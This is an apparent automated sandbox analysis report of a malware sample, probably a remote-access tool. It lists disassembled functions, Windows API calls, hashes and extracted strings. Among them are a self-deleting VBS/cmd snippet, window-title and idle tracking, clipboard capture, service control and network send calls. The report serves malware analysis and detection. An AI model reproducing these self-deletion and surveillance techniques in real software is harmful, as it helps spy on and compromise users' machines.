                                                                                                                                                Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                • _free.LIBCMT ref: 0045137F
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 004513A1
                                                                                                                                                • _free.LIBCMT ref: 004513B6
                                                                                                                                                • _free.LIBCMT ref: 004513C1
                                                                                                                                                • _free.LIBCMT ref: 004513E3
                                                                                                                                                • _free.LIBCMT ref: 004513F6
                                                                                                                                                • _free.LIBCMT ref: 00451404
                                                                                                                                                • _free.LIBCMT ref: 0045140F
                                                                                                                                                • _free.LIBCMT ref: 00451447
                                                                                                                                                • _free.LIBCMT ref: 0045144E
                                                                                                                                                • _free.LIBCMT ref: 0045146B
                                                                                                                                                • _free.LIBCMT ref: 00451483
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                                                                                                                  • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                                                                                                                  • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                • API String ID: 1913171305-3159800282
                                                                                                                                                • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                                                                                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                                                                                • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                                                                                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                                                                                Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                                                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                                                                                Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                                                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                • String ID: H
                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                                Function 0044ACC9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                • String ID: PkGNG$tC
                                                                                                                                                • API String ID: 3864826663-4196309852
                                                                                                                                                • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                                                                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                                • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                                                                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                                Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID: \&G$\&G$`&G
                                                                                                                                                • API String ID: 269201875-253610517
                                                                                                                                                • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                                                                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                                • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                                                                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                                Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 65535$udp
                                                                                                                                                • API String ID: 0-1267037602
                                                                                                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                                Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                • API String ID: 911427763-3954389425
                                                                                                                                                • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                                                                                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                                                                                • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                                                                                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                                                                                                Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LongNamePath
                                                                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                • API String ID: 82841172-425784914
                                                                                                                                                • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                                                                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                                                                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                                                                                Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                                • _free.LIBCMT ref: 0043A9C3
                                                                                                                                                • _free.LIBCMT ref: 0043A9CA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2441525078-0
                                                                                                                                                • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                                                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                                • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                                                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                • API String ID: 2956720200-749203953
                                                                                                                                                • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                                                                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                                • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                                                                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                                Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                                • API String ID: 1704390241-2575729100
                                                                                                                                                • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                                                                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                                • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                                                                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                                Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                • String ID: !D@
                                                                                                                                                • API String ID: 2172192267-604454484
                                                                                                                                                • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                                                                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                                • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                                                                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                                Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 297527592-0
                                                                                                                                                • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                                                                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                                • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                                                                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                                Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                                                                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                                • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                                                                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                                Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 004481B5
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 004481C1
                                                                                                                                                • _free.LIBCMT ref: 004481CC
                                                                                                                                                • _free.LIBCMT ref: 004481D7
                                                                                                                                                • _free.LIBCMT ref: 004481E2
                                                                                                                                                • _free.LIBCMT ref: 004481ED
